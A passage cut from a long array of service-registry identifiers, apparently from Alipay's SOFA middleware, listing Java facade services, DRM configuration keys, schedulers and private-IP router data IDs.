ID#@#DEFAULT_GROUP","com.alipay.ordermng.common.service.api.merchant.MerchantBizBelongService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.configRelation.ConfigOfAuthonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.116.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insautomarket.common.facade.content.AutoMktContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_NFCC#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.blood.ZbdmAppBloodFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ropcn@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.27.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilesync.common.service.spi.api.MobileSyncUpstreamSpiService:1.0:adatabus@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.al.studio.service.facade.kmi.KmiAdaptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.flux.spi.FinnetReceiveService:1.0:overseaprod_transfer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.crsociety.api.TrInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.fluxconf.service.facade.ctrl.DataClientFetchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-memberprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.arcore.common.service.sdk.facade.BatchArOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insdataprod.common.service.facade.api.AutoInsScoringRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mrchmobile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FCALM#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdarttool.facade.netflow.NetFlowRechargeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AmMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.144.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.shared.drm.impl.InvestmentAssistantDrmMangerImpl.disableProfolios,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:resmng-depositReceiptPMCCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_FDBUDGET_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-omocore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mitemcenter.common.service.facade.api.PropertyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-fininsightcore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kmi.common.service.client.api.KmiClientApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_169.254.118.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.grscore.common.service.facade.api.dailymng.GrsWorkloadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.ci.CodeAttackCiCallbackFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securitycap.common.service.facade.worktask.facade.WorkTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.MerchantFlagFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.UctransFailoverDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finsnsbff:name=com.alipay.finsnsbff.stock.discoverySubjectsItemCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.facade.MerchantInstRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstoreapp.common.service.content.facade.album.api.ShopAlbumManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iotProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.mydds.core.engine.drm.GlobalPublishResource.message,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityexprod.biz.alipayauth.service.AlipayAuthSecurityLoginService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.FinCommonLogRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.anteduprod.common.service.facade.api.SceneUserConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.activity.ActivityP2pSpreadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:insofflineinvest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.55.112.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.admediamgr.common.service.facade.service.media.PaymentButtonServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiangw.common.service.client.service.InsGatewayExterfaceInvokeService:1.0:autoinsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.transfer.BankTransferFundManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minishopprod.common.service.facade.api.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:openitemcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcbenefitcore.facade.api.discount.BFDiscountUseTwoPhaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.user.UserSessionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.118.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.consumecenter.core.ruleengine.BizDecider:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.quickOpsZone,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.MedicalAckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.deepinsight.facade.CrowdUploadFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.CategoryPubFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finaggexpbff.facade.previewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityasset.common.service.facade.spi.TransferDrivenSpi:1.0:globalremitprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbill.facade.installment.api.PcreditBillCommonBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.128.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.giftprod.common.service.facade.GiftSnsShareService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mrchorder@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.lifemng.lifemngmysqlDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@paydecision#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.ifaatam.common.service.facade.ifaatam.OssService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:igpayrouter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:insclaimportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.prophet.InventoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:peiqi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apyunqing.facade.ProdDependenceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.settlequery.common.service.facade.deposit.api.InstpayDepositHisQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.spring.isCloseSpringTwentyRedEnvelopeCorrectCardState,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.openapi.clientswitch.ClientSwitchOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassetcore.common.service.asseteval.facade.AssetValuationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.endStarWishTransactionDowngrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iglobalfundcontrol.common.config.api.MarketQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:kbmmweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_O_DWDSPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.instfund.facade.api.InstFundMonitorManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.blacklist.BlackListQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.loadNeedRemindDateDiff,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.client.flowctrl60#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfundbankcore.common.service.facade.query.FundBankContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instservicegovern.common.facade.api.InstServiceAbilityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.lisa.service.alipayauth.EntSecurityProductService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.antcloud.AntCloudPunishClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.riskevaluate.RiskIndicatorEvaluateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.119.156#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcardcore.common.service.facade.PcardDirectDepositFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.protocol-https:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.camp.CampFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.certifycenter.core.service.verification.org.OrgVerificationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.EmployeeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dss.endpoint.plugin.openapi.ConfigOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.findecision.common.service.facade.FindssIdentifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprodfactory.common.service.InsProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.GlobalSearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.facade.IBatchInstanceRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundboss.common.service.facade.diagnosis.DrcNoTriggerDiagnosticFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.channels.ChannelDetectService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloanweb.facade.LoanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_MOA_INTERNAL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.checkroute.common.service.checkersdk.service.ChangeRiskDefenseService:1.0:infrachecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.ext.DingDingUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@fundapplication#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.mybank.bkdmc.common.service.facade.TitanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementFacade:1.0:cif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.securityidentify.EWorkCardGuideInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fcrcportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.vein.winbillboard.common.service.facade.graph.FullDataQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insclaiminvestcore.common.service.facade.service.utils.PropertyConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:openhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gfsettle.facade.api.WriteoffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.176.150#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_XZYTEST_SERVERLESS_TASK_STREAM_FUNC_temp4@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superlink.service.facade.api.batch.BatchAsynSendService:1.0:superlink@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditbenefit.bluearrow.trigger@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:onerror-custom-500@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.97.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finannafccore.common.service.facade.judge.api.JudgeExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.confreg.api.ResAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finecorisk.common.facade.service.api.ha.FinHaConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpdcore:name=com.alipay.fin.pdcore.common.util.drm.DbDrmConfigure.deployDbNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.mordercenter.MocCorfirmGoodsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","test003.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.limiter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.indirectIsvForMerchantGrayConfigString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.updateMerchantJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.insttrade.biz.service.impl.pre.PreEnvControlDrm.payerAccountWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_M_SETTLE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mpromocenter.recruit.extension.service.facade.api.RecruitLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydatastudio:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.127.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.custprod.service.api.certify.OrgCertifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.notify.ApiNotifyRuleFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmatchcore.common.service.facade.statistic.service.AppointmentMatchStaticFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.biz.customized.spi.FeatureSnapshotSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grscore.common.service.facade.api.more.UserAssociateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciTairCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.category.MccFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.growthplus.groupgrowth.ExchangeStrategyDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dchainbankloan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.TemplateAttributeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bumng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.extend-request:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revcore.common.service.facade.api.query.RevAccountQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_PRIVATE_CLOUD_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.240.246#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.242.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opencommon.rcache.facade.RCacheAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.120.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.aciamcore.common.service.facade.login.MfaConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.DataImportService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmarketingprod.common.service.facade.campaign.InsMktProdCampaignCenterQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.commandcenter:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_FCPROCESS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.EmcStatisticResultQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.finance.common.findecisionclient.drm.CacheResource.refreshCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.ryb.RYBYieldQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.isv.IsvSpiQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.acl.AclResourceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.QueryNewsInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:prodmng-salesplan-callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.MarketClassifyDataInitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.offer.OfferRelaManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inststub.common.service.facade.proxy.ServiceProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.repository.AntiDuplicateRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbgrouppurchaseprod.common.service.facade.user.GroupUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.68.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.etetestcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baitiaoprod.common.service.facade.query.AccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pam.PamNamelistQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.order.facade.AppointmentOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.166.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.218.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecashier.service.facade.CashierResultPageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:kbbp_query_applyment_bPProcessCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.innertrans.common.service.facade.api.InnerTransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.spi.InstinfoSystemCallService:1.0:customscenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_FRDCPLATFORM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.52.96.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.settlement.common.service.facade.api.HoldService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.biz.shared.bxs.BxsCheckTicketsService:1.0:bxsZhxCheckTicketsServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-lotterykoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.InstLoanTotalRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:unitradeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ibizsupport.common.service.facade.api.DepositAssetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.agaccesstoken.AgATKContactPointManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.specialLicense.SpecialLicenseSofaRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSTRADEPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.client.drm7313#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkloanportal.facade.stationing.SignAuthContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbdevice.common.service.facade.device.AccessoriesQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.commonagentfund.api.CaftransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AmNameListConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementHistoryQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.${pdcore_app_name}:name=com.alipay.fc.prodquery.common.service.ldc.drm.PdcoreZoneRouteConfigDRM.facadeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promox.